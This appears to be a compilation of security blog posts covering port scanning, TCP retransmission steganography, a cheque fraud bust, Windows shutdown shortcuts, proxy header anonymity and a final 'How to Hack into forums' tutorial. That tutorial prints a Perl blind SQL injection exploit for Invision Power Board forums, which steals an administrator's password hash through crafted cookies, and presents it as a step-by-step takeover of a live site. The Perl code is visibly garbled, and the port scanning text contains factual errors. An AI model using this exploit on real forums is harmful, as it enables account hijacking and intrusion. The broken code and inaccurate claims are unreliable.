Port scanning determines which ports on the targeted host are listening for connections. These ports represent potential communication channels. Port scanning gives us a close view of the host's network communication, and knowing more about the victim's network is useful for further attacks. The internet does not rely exclusively on TCP port 80, which is used by the hypertext transfer protocol (HTTP); port scanning can be used efficiently to reveal the host's secrets.
Automated port scanners are needed to perform such scanning, and they are available on the market at very low cost.
Port scanning is done to gather information passively about the victim. This helps an intruder eavesdrop on the victim's network.
Such scanning also helps gather the information needed to form a network map. Network maps are useful for learning the victim's network architecture or hierarchy.
There are thousands of ports available for communication on a network; some well-known ones are FTP, HTTP and SMTP. Which ports remain open or closed depends on the network's requirements; for example, a web server will always have an FTP port open.
Every port has a unique number, which is targeted after a successful port scan. Various bugs and backdoors are tried against these ports to test whether the system is vulnerable.
This is how a successful attack through port scanning is done.
Hope you have enjoyed this informative article about port scanning. Next we cover the requirements of a good port scanner.
Intrusion Attack Through Port Scanning
Requirements for Good Port Scanners
Dynamic delay time calculations: Some scanners need a delay time between sending chunks of data. You can check the delay with ping, which replies to every request, but that is sometimes cumbersome; instead, connect() to a closed port on the target, which gives you an initial delay time for your scanner. Simple, isn't it!
Parallel port scanning: Scanners generally scan ports linearly, one by one, until all ports have been tried, but this old technique only works well with TCP on a fast network. Test whether your port scanner supports parallel port scanning, because you may have to scan a large network or a wide area network.
Flexible port specification: Can you believe we need to scan all 65535 ports? It would be a slow and tiresome process. Scanners that only allow you to scan ports 1 - N also often fall short of an intruder's needs. Test whether your scanner has a port-range option that lets you specify exactly the ports to scan.
Flexible target specification: On a larger network you will surely want to scan more than one or two hosts, so your port scanner should support flexible target specification.
Retransmission: Sending chunks and waiting for a response is the classic scanner technique, but it can lead to false positives or negatives when packets are dropped. So, check whether your scanner has automatic retransmission.
These are the primary considerations. Secondary considerations include down-host detection, own-IP detection, an IP scanner, etc.
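Two of the requirements above, flexible port specification and the closed-port trick for measuring an initial delay, can be checked with a few lines of code. The following is an added example written for this page, not code from the article or from any particular scanner: it parses a port list such as "22,80,443,8000-8010", times connect() attempts to a port it knows to be closed, and derives a probe timeout from the measured delay. The loopback host and the timeout heuristic (four times the RTT, never below 50 ms) are assumptions made so the example runs offline.

```python
import socket
import statistics
import time


def parse_port_spec(spec, lo=1, hi=65535):
    """Expand a comma-separated port specification such as
    "22,80,443,8000-8010" into a sorted list of unique ports.
    Raises ValueError for malformed items or ports outside lo..hi."""
    ports = set()
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if "-" in item:
            first, last = item.split("-", 1)
            start, end = int(first), int(last)
            if start > end:
                raise ValueError(f"descending range: {item!r}")
        else:
            start = end = int(item)
        if start < lo or end > hi:
            raise ValueError(f"port outside {lo}-{hi}: {item!r}")
        ports.update(range(start, end + 1))
    return sorted(ports)


def find_closed_local_port(host="127.0.0.1"):
    """Pick a port that is currently closed on the local host by binding an
    ephemeral port and releasing it. Only meaningful for localhost; for any
    other host the caller must supply a port it knows to be closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def estimate_initial_delay(host="127.0.0.1", port=None, samples=5, timeout=2.0):
    """Time connect() attempts to a closed port and return the median elapsed
    seconds. A closed port answers the SYN with RST, so connect() fails almost
    immediately and the elapsed time approximates one round trip. This is the
    closed-port trick described above; localhost is used here (assumption)
    only so the example runs offline."""
    if port is None:
        port = find_closed_local_port(host)
    elapsed = []
    for _ in range(samples):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            t0 = time.perf_counter()
            try:
                s.connect((host, port))
            except OSError:
                pass  # ECONNREFUSED (or a timeout) is the expected outcome
            elapsed.append(time.perf_counter() - t0)
    return statistics.median(elapsed)


def scanner_timeout(rtt, factor=4.0, floor=0.05):
    """Derive a per-probe timeout from the measured delay: a multiple of the
    RTT, but never below a floor so noisy measurements do not starve probes.
    The factor and floor are constructed for this example, not a standard."""
    return max(factor * rtt, floor)


if __name__ == "__main__":
    print(parse_port_spec("22,80,443,8000-8010"))
    rtt = estimate_initial_delay()
    print(f"median connect() delay to a closed local port: {rtt * 1000:.3f} ms")
    print(f"suggested probe timeout: {scanner_timeout(rtt):.3f} s")
```

The parser rejects port 0, anything above 65535 and descending ranges, which is exactly where a "ports 1 - N" scanner tends to fall short; the delay measurement only makes sense against a port that really is closed, so for any host other than localhost pass a port you have confirmed is closed rather than relying on the ephemeral-port trick.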
Hiding secret messages in internet traffic
Researchers have demonstrated a new way to hide secret messages in internet traffic that can elude even vigilant network operators.
The process is a network application of steganography, which is the ancient science and art of hiding messages in documents, pictures and other media in a way that can be easily detected by the intended recipient, but not by third parties. The researchers from the Warsaw University of Technology have found a way to apply the principle to network traffic by exploiting design weaknesses in TCP, or transmission control protocol.
RSTEG, short for Retransmission Steganography, works by manipulating the back-and-forth sequence of messages exchanged each time an internet packet is sent. Typically, the computer on the receiving end sends a confirmation each time a packet is successfully transmitted. RSTEG works by deliberately withholding that acknowledgment, which prompts the packet to be resent.
"In the context of RSTEG, a sender replaces original payload with a steganogram instead of sending the same packet again," the paper, authored by Wojciech Mazurczyk, Miłosz Smolarczyk, and Krzysztof Szczypiorski, states. "When the retransmitted packet reaches the receiver, he/she can then extract hidden information."
The technique has important implications for network security because attackers can use it to conceal the leakage of confidential information, the paper warns. It goes on to detail four scenarios in which the attack can be used, including one that requires no control of intermediate nodes. The other three are harder to pull off, but they are also harder for third parties to detect.
"No real-world steganographic method is perfect; whatever the method, the hidden information can be potentially discovered," the researchers write. "In general, the more hidden information is inserted into the data stream, the greater the chance that it will be detected, for example, by scanning the data flow or by some other steganalysis methods."
To evade detection, those using the technique must limit the number of retransmissions to non-suspicious levels.
Steganography dates back to the Fifth Century BC at least, when Greek messengers buried messages on wax tablets before sealing them with beeswax. In more recent times, it's been used to sneak data into all kinds of electronic media, including digital photographs and executable files. The same Polish researchers who described RSTEG also developed a similar technique targeting voice over IP traffic.
While RSTEG works only with TCP, the principle can be applied to other protocols as well, including those for wireless networks. A PDF of the paper is available here
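The two detection angles the article mentions, scanning the data flow and watching the retransmission rate, can be written down as a small stateful check. The following is an added example for this page, not code from the paper or its authors: it remembers a digest of every TCP segment keyed by flow, sequence number and length, treats a repeat as a retransmission, and reports a repeat whose bytes differ from the original, which is what RSTEG produces, since a normal stack resends the same data. It also flags flows whose retransmission ratio exceeds a threshold. The traffic records, the 5% threshold and the record format are constructed for the example.

```python
import hashlib
from collections import defaultdict


def segment(src, dst, seq, payload, sport=40000, dport=443):
    """Build one observed TCP segment record (constructed format for this example)."""
    return {"src": src, "sport": sport, "dst": dst, "dport": dport,
            "seq": seq, "payload": payload}


def build_sample():
    """Constructed traffic: flow A is ordinary with one genuine retransmission,
    flow B retransmits a segment whose payload has been replaced (the RSTEG
    signature), flow C is ordinary but retransmits far too often."""
    a, b, c, srv = "10.0.0.5", "10.0.0.7", "10.0.0.9", "203.0.113.10"
    segs = []
    for i in range(20):
        segs.append(segment(a, srv, 100 * i, bytes([i]) * 100))
    segs.append(segment(a, srv, 500, bytes([5]) * 100))   # lost segment, resent unchanged
    segs.append(segment(b, srv, 0, b"A" * 64))
    segs.append(segment(b, srv, 64, b"C" * 64))
    segs.append(segment(b, srv, 0, b"B" * 64))            # same seq and length, different bytes
    for i in range(4):
        segs.append(segment(c, srv, 100 * i, bytes([0x41 + i]) * 100))
    segs.append(segment(c, srv, 100, b"B" * 100))         # identical retransmission
    segs.append(segment(c, srv, 200, b"C" * 100))         # identical retransmission
    return segs


def analyze_flows(segments):
    """Track every (flow, seq, length) seen; a repeat is a retransmission.
    Compare the repeat's payload digest with the original's: a mismatch is
    the RSTEG signature. Returns per-flow counters and the mismatch findings."""
    seen = {}
    stats = defaultdict(lambda: {"segments": 0, "retransmissions": 0, "mismatches": 0})
    findings = []
    for s in segments:
        flow = (s["src"], s["sport"], s["dst"], s["dport"])
        key = (flow, s["seq"], len(s["payload"]))
        digest = hashlib.sha256(s["payload"]).hexdigest()
        st = stats[flow]
        st["segments"] += 1
        if key in seen:
            st["retransmissions"] += 1
            if seen[key] != digest:
                st["mismatches"] += 1
                findings.append((flow, s["seq"]))
        else:
            seen[key] = digest
    return dict(stats), findings


def flag_flows(stats, max_retrans_ratio=0.05):
    """Flag a flow on any payload mismatch, or when its retransmission ratio
    exceeds the threshold a covert sender would have to stay under."""
    flagged = []
    for flow, st in stats.items():
        ratio = st["retransmissions"] / st["segments"]
        if st["mismatches"] or ratio > max_retrans_ratio:
            flagged.append(flow)
    return flagged


if __name__ == "__main__":
    stats, findings = analyze_flows(build_sample())
    for flow, st in stats.items():
        print(flow, st)
    print("payload mismatches:", findings)
    print("flagged flows:", flag_flows(stats))
```

Two caveats for real traffic: a sending stack may retransmit with different segment boundaries, so a key of (seq, length) misses some repeats and a production check should compare overlapping byte ranges instead, and the ratio threshold has to be set above the link's genuine loss rate or ordinary lossy flows will be flagged alongside covert ones.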
Massive ID fraud and cheque scam busted in NYC
A corporate identity theft ring that exploited the identities of local corporations, religious institutions, hospitals and even schools to run a cheque fraud scam has been busted in New York.
Investigators reckon the gang of 18 suspects made millions by impersonating workers from an estimated 350 New York-based organisations. Data purchased from corrupt bank insiders was used to lay the groundwork for the scam, which relied on cashing thousands of counterfeit payroll cheques. The fraudsters also plundered the bank accounts of individual victims, using data obtained from corrupt bank insiders to transfer funds to banks under the control of the gang.
Police are investigating the possible involvement of other suspected bank workers in the scam as part of the ongoing investigation.
Source: The Register
Create One-Click Shutdown and Reboot Shortcuts
But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:
shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message “Rebooting your PC.” The shutdown command includes a variety of switches you can use to customize it.
I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:
shutdown -s -t 03 -c "Bye Bye m8!"
shutdown -r -t 03 -c "I'll be back m8 ;)!"
Switch            What it does
-s                Shuts down the PC.
-l                Logs off the current user.
-t nn             Indicates the duration of the delay, in seconds, before performing the action.
-c "messagetext"  Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-f                Forces any running applications to shut down.
-r                Reboots the PC.
Anonymity of a Proxy Server Explained
- name and a version of an operating system
- name and a version of a browser
- configuration of a browser (display resolution, color depth, java / javascript support, …)
- IP-address of a client
- Other information
- country where you are from
- city
- your provider's name and e-mail
- your physical address
These are examples of variable values:
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined
Transparent Proxies
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP
Anonymous Proxies
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address
High Anonymity Proxies
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined
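Seen from the web server's side, the three proxy classes above differ only in what REMOTE_ADDR, HTTP_VIA and HTTP_X_FORWARDED_FOR contain. The following is an added example for this page, not code from the article, that applies those rules to a CGI-style environment dictionary. The one thing the server cannot decide from headers alone is whether a disclosed X-Forwarded-For address is the real client or a random one, so the function takes an optional known client address (for instance your own, when you test your own proxy); the 198.51.100.9 address in the usage is a constructed value, the other addresses come from the article's examples.

```python
import ipaddress


def first_ip(header_value):
    """Return the first syntactically valid address in a comma-separated
    X-Forwarded-For value, or None when the header is absent or carries no
    address (the "not determined" case above)."""
    if not header_value:
        return None
    for part in header_value.split(","):
        try:
            return str(ipaddress.ip_address(part.strip()))
        except ValueError:
            continue
    return None


def classify_proxy(environ, known_client_ip=None):
    """Classify the proxy level visible to a web server from the CGI-style
    variables listed above. known_client_ip is the client's real address if
    the server happens to know it; without it a disclosed address cannot be
    verified as genuine, so that case is reported as unverified."""
    remote = environ.get("REMOTE_ADDR")
    via = environ.get("HTTP_VIA")
    xff = first_ip(environ.get("HTTP_X_FORWARDED_FOR"))
    if not via and xff is None:
        # Neither header present: a direct client and a high anonymity
        # proxy look identical from here.
        return "direct or high anonymity proxy"
    if xff is None or xff == remote:
        # Proxy announces itself but discloses no client address, or just
        # repeats its own address.
        return "anonymous proxy"
    if known_client_ip is None:
        return "transparent or forging proxy (client address unverified)"
    if xff == known_client_ip:
        return "transparent proxy"  # the client's real address leaked
    return "anonymous proxy (forged X-Forwarded-For)"


if __name__ == "__main__":
    squid = {"REMOTE_ADDR": "194.85.1.1",
             "HTTP_VIA": "194.85.1.1 (Squid/2.4.STABLE7)",
             "HTTP_X_FORWARDED_FOR": "194.115.5.5"}
    print(classify_proxy(squid, known_client_ip="194.115.5.5"))
    print(classify_proxy(squid, known_client_ip="198.51.100.9"))  # constructed client
    print(classify_proxy({"REMOTE_ADDR": "194.85.1.1"}))
```

Only the first address in X-Forwarded-For is inspected because a chain of proxies appends later hops to the right; a value such as "unknown" is treated the same as an absent header, since it discloses nothing.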
Summary
How to Hack into forums
This is what you like to call “Hacking a forum”.
I call it “Cracking into a forum” … Learn what hacking means you, lol…
PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be referring to it as “hackingsite”.
So you’ve got your target. You know the forum you want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.
Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:
CODE
#!/usr/bin/perl -w
##################################################################
# This one actually works Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent(”Mosiac 1.0″ . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = ”;}
if (!$ARGV[3]) {$ARGV[3] = ”;}
my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n”;
exit;
}
my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);
my $outputs = ”;
for( $i=1; $i < j=”0;” current =” $charset[$j];” sql =” (” cookie =” (’Cookie’”> $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = ”;
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print “$current\n”;
last;
}
}
if ( length($outputs) < member_id=” . $user . ” pass_hash=”">
What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script.